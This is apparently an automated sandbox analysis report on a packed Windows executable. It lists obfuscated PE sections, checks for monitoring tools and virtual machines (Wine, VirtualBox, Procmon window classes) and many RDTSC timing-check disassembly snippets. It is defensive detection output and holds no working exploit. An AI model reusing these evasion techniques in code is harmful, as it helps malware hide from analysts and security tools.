                Source: zLP3oiwG1g.exeStatic PE information: Raw size of hzyqibdm is bigger than: 0x100000 < 0x2b3200

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeUnpacked PE file: 0.2.zLP3oiwG1g.exe.3b0000.0.unpack :EW;.rsrc :W;.idata :W;hzyqibdm:EW;ehrkmnwb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hzyqibdm:EW;ehrkmnwb:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: zLP3oiwG1g.exeStatic PE information: real checksum: 0x2e5847 should be: 0x2e57e8
                Source: zLP3oiwG1g.exeStatic PE information: section name:
                Source: zLP3oiwG1g.exeStatic PE information: section name: .rsrc
                Source: zLP3oiwG1g.exeStatic PE information: section name: .idata
                Source: zLP3oiwG1g.exeStatic PE information: section name: hzyqibdm
                Source: zLP3oiwG1g.exeStatic PE information: section name: ehrkmnwb
                Source: zLP3oiwG1g.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E998 push eax; retf 0_3_0037E99A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E998 push eax; retf 0_3_0037E99A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_00381646 push ecx; retf 0_3_0038166C
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E998 push eax; retf 0_3_0037E99A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E998 push eax; retf 0_3_0037E99A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_003747A2 push FC693602h; retf 0_3_003747A7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_00381666 push ecx; retf 0_3_0038166C
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_00381646 push ecx; retf 0_3_0038166C
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037D7F4 push esi; retf 0_3_0037D7F7
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037F93D push edx; retn 0051h0_3_0037F96A
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeCode function: 0_3_0037E13B push ecx; ret 0_3_0037E152
                Source: zLP3oiwG1g.exeStatic PE information: section name: entropy: 7.979217064192899

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 4086F9 second address: 408710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 408009 second address: 40800E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58AB29 second address: 58AB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 589B47 second address: 589B6C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC69CE9FC5Ch 0x00000012 jmp 00007FC69CE9FC5Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 589B6C second address: 589B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC69CB9B4ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 589B7A second address: 589B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 589E46 second address: 589E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 589E4C second address: 589E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 589E50 second address: 589EAE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69CB9B4A6h 0x00000008 jmp 00007FC69CB9B4B8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007FC69CB9B4ADh 0x00000016 jnc 00007FC69CB9B4BAh 0x0000001c push eax 0x0000001d push edx 0x0000001e jns 00007FC69CB9B4A6h 0x00000024 jmp 00007FC69CB9B4ABh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58A435 second address: 58A43F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D304 second address: 58D309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D309 second address: 58D376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jns 00007FC69CE9FC57h 0x00000012 movzx ecx, cx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FC69CE9FC58h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 call 00007FC69CE9FC59h 0x00000036 jns 00007FC69CE9FC64h 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 jo 00007FC69CE9FC56h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D376 second address: 58D3B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC69CB9B4B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D3B0 second address: 58D3B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D3B4 second address: 58D3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D3BA second address: 58D3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D3BF second address: 58D3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jmp 00007FC69CB9B4ABh 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 js 00007FC69CB9B4B0h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D49D second address: 58D4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D4E0 second address: 58D4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D4E4 second address: 58D56B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f nop 0x00000010 jmp 00007FC69CE9FC5Eh 0x00000015 push 00000000h 0x00000017 mov ecx, dword ptr [ebp+122D2CF9h] 0x0000001d push 2DC97680h 0x00000022 jmp 00007FC69CE9FC5Ch 0x00000027 xor dword ptr [esp], 2DC97600h 0x0000002e mov esi, ebx 0x00000030 sbb di, 30DEh 0x00000035 push 00000003h 0x00000037 clc 0x00000038 push 00000000h 0x0000003a call 00007FC69CE9FC5Fh 0x0000003f mov edi, dword ptr [ebp+122D1E36h] 0x00000045 pop edi 0x00000046 push 00000003h 0x00000048 jmp 00007FC69CE9FC66h 0x0000004d call 00007FC69CE9FC59h 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D56B second address: 58D571 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D571 second address: 58D578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D578 second address: 58D589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FC69CB9B4AEh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D589 second address: 58D5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jng 00007FC69CE9FC5Eh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FC69CE9FC64h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push esi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D5BE second address: 58D608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop eax 0x00000007 xor dword ptr [ebp+122D37A5h], edi 0x0000000d lea ebx, dword ptr [ebp+1245917Eh] 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FC69CB9B4A8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+122D2EE1h] 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 jmp 00007FC69CB9B4ABh 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D608 second address: 58D60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D60C second address: 58D610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58D71A second address: 58D7E0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC69CE9FC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 6B3817D1h 0x00000011 mov si, C5FBh 0x00000015 push 00000003h 0x00000017 movzx edi, cx 0x0000001a jmp 00007FC69CE9FC65h 0x0000001f push 00000000h 0x00000021 mov di, EC5Bh 0x00000025 push 00000003h 0x00000027 push 749AA7A5h 0x0000002c push ecx 0x0000002d jmp 00007FC69CE9FC64h 0x00000032 pop ecx 0x00000033 add dword ptr [esp], 4B65585Bh 0x0000003a jp 00007FC69CE9FC5Ch 0x00000040 lea ebx, dword ptr [ebp+12459189h] 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FC69CE9FC58h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 0000001Ch 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 jmp 00007FC69CE9FC62h 0x00000065 jng 00007FC69CE9FC56h 0x0000006b push eax 0x0000006c jo 00007FC69CE9FC7Bh 0x00000072 push eax 0x00000073 push edx 0x00000074 jo 00007FC69CE9FC56h 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AC8A5 second address: 5AC8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CB9B4B7h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC69CB9B4B9h 0x00000014 jg 00007FC69CB9B4A6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AC8E5 second address: 5AC8FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC63h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AC8FC second address: 5AC90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC69CB9B4ACh 0x0000000c jnp 00007FC69CB9B4A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AC90E second address: 5AC914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5AC914 second address: 5AC918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ACA41 second address: 5ACA47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ACA47 second address: 5ACA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ACA50 second address: 5ACA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC69CE9FC56h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ACA5B second address: 5ACA7C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC69CB9B4ACh 0x00000008 jne 00007FC69CB9B4A8h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jnp 00007FC69CB9B4B0h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ACC01 second address: 5ACC22 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC69CE9FC63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007FC69CE9FC6Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ACD5E second address: 5ACD7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FC69CB9B4A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ACD7E second address: 5ACD9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC69CE9FC67h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 583865 second address: 583898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC69CB9B4B4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 583898 second address: 58389C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
